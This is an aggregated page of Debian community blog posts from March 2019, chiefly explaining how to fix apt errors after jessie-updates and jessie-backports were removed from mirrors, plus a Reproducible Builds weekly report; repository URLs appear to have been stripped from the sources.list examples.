28 March, 2019 - 04:46

If you are still running jessie you probably noticed that the jessie-updates and jessie-backports suites have been removed from mirrors, because you got those error messages:

W: Failed to fetch 404 Not Found [IP: 80]
W: Failed to fetch 404 Not Found [IP: 80]

I was not involved in that decision (which was made by the FTP masters team), but since there is some confusion around it, I will try to give my understanding of the resulting issues.

The typical /etc/apt/sources.list file for a jessie system with backports enabled is:

deb jessie main
deb-src jessie main

deb jessie/updates main
deb-src jessie/updates main

deb jessie-updates main
deb-src jessie-updates main

deb jessie-backports main contrib non-free
deb-src jessie-backports main contrib non-free

Debian packages are distributed using suites (which can be understood as channels). The global picture looks like this:

(This is slide 42 of the Debian Packaging Tutorial.)

deb stretch main is the easy one. It contains the bulk of packages. It is initialized by copying the content of the testing suite when a new stable release happens, approximately every two years. It is then updated from stable-new (an internal suite) when stable point releases happen (see below).

deb jessie/updates main is the security suite in the figure above. It is used by the Debian security team to provide security updates. They are announced on the debian-security-announce mailing list.

deb jessie-updates main (stable-updates above) is a suite used to distribute important updates that are unrelated to security, and that cannot wait the next stable point release. They are announced on the debian-stable-announce mailing list. Interestingly, a large proportion of those updates are related to changes to daylight-saving-time rules that are sometimes made very late by some countries.

stable point releases happen every few months (see for example the Debian 8.11 stable point release). They consist in updating the stable suite by copying important updates that were submitted to stable-proposed-updates. Security updates are also included.

backports follow an entirely different path. They are new versions of packages, based on the version currently in the testing suite. See the backports team website.

So, what happened?

In June 2018…

Debian 8.11 (in June 2018) was the final update for Debian 8. As stated in its announcement:

After this point release, Debian's Security and Release Teams will no
longer be producing updates for Debian 8. Users wishing to continue to
receive security support should upgrade to Debian 9, or see for details about the subset of
architectures and packages covered by the Long Term Support project.

In other words: jessie and jessie-updates won’t receive any update. The only updates will be through the security suite, by the Debian Long Term Support project.

At about the same time (I think – I could not find an announcement), the maintenance of backports for jessie was also stopped. Which makes sense, because the backports team provides backports for the current release, and stretch was released in June 2017.

In March 2019…

The FTP masters team decided to remove the jessie-updates and jessie-backports suite from the mirrors. This was announced on debian-devel-announce, resulting in the errors quoted above.

How to solve this?

For the jessie-updates suite, you can simply remove it from your /etc/apt/sources.list. It is useless, because all packages that were in jessie-updates were merged into jessie when Debian 8.11 was released.

The jessie-backports suite was archived on, so you can use:

deb jessie-backports main contrib non-free
deb-src jessie-backports main contrib non-free

But then you will run into another issue:

E: Release file for is expired (invalid since 36d 1h 9min 51s). Updates for this repository will not be applied.

Unfortunately, with the APT version in jessie, this cannot be ignored on a per source basis (it can with the APT version from stretch, using the deb [check-valid-until=no] ... syntax). So you need to disable this check globally, using:

echo 'Acquire::Check-Valid-Until no;' > /etc/apt/apt.conf.d/99no-check-valid-until

After that, apt-get update just works.

(There are some discussions about resurrecting the jessie-updates suite to avoid the above errors, but it is probably getting less and less useful as time passes.)

Reproducible builds folks: Reproducible Builds: Weekly report #204

27 March, 2019 - 21:01

Here’s what happened in the Reproducible Builds effort between Sunday March 17 and Saturday March 23 2019:

Don’t forget that Reproducible Builds is part of May/August 2019 round of Outreachy which offers paid internships to work on free software. Internships are open to applicants around the world and are paid a stipend for the three month internship with an additional travel stipend to attend conferences. So far, we received more than ten initial requests from candidates and the closing date for applicants is April 2nd. More information is available on the application page.

diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week:

  • Chris Lamb:
    • Always warn if the tlsh module is not available (not just if a specific fuzziness threshold is specified) to match the epilog of the --help output. This prevents missing support for file rename detection. (#29)
    • Fix a number of tests when using GhostScript 9.20 vs 9.26 for Debian stable vs. the same distribution with the security/point release applied. []
  • Mattia Rizzolo:
    • Ignore the version mismatch detection when building backport. []
    • Make test_ps.test_text_diff pass with ghostscript 9.26. []
  • Milena Boselli Rosa:
    • Remove the type HTML attribute from style elements. []
    • Prevent empty values for the name attribute name on HTML anchor tags and add an id to its parent div container. []
    • Fix a Text run is not in Unicode Normalization Form C HTML validation warning. []
    • Fix a Table column x established by element ‘col’ has no cells beginning in it HTML validation error. []
Packages reviewed and fixed, and bugs filed Test framework development

We operate a comprehensive Jenkins-based testing framework that powers This week, Mattia Rizzolo:

  • Fixed the dsa-check-running-kernel script after Ubuntu updated their packages. []
  • Do not blindly forward the jenkins@ emails, otherwise procmail cannot filter them (breaking our email2irc script). []
  • Gave Vagrant Cascadian root everywhere. []

This week’s edition was written by Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Mattia Rizzolo and Vagrant Cascadian & was reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Joachim Breitner: How to merge a Pull Request

27 March, 2019 - 17:46

It’s easy!

How to merge a pull request


Creative Commons License ลิขสิทธิ์ของบทความเป็นของเจ้าของบทความแต่ละชิ้น
ผลงานนี้ ใช้สัญญาอนุญาตของครีเอทีฟคอมมอนส์แบบ แสดงที่มา-อนุญาตแบบเดียวกัน 3.0 ที่ยังไม่ได้ปรับแก้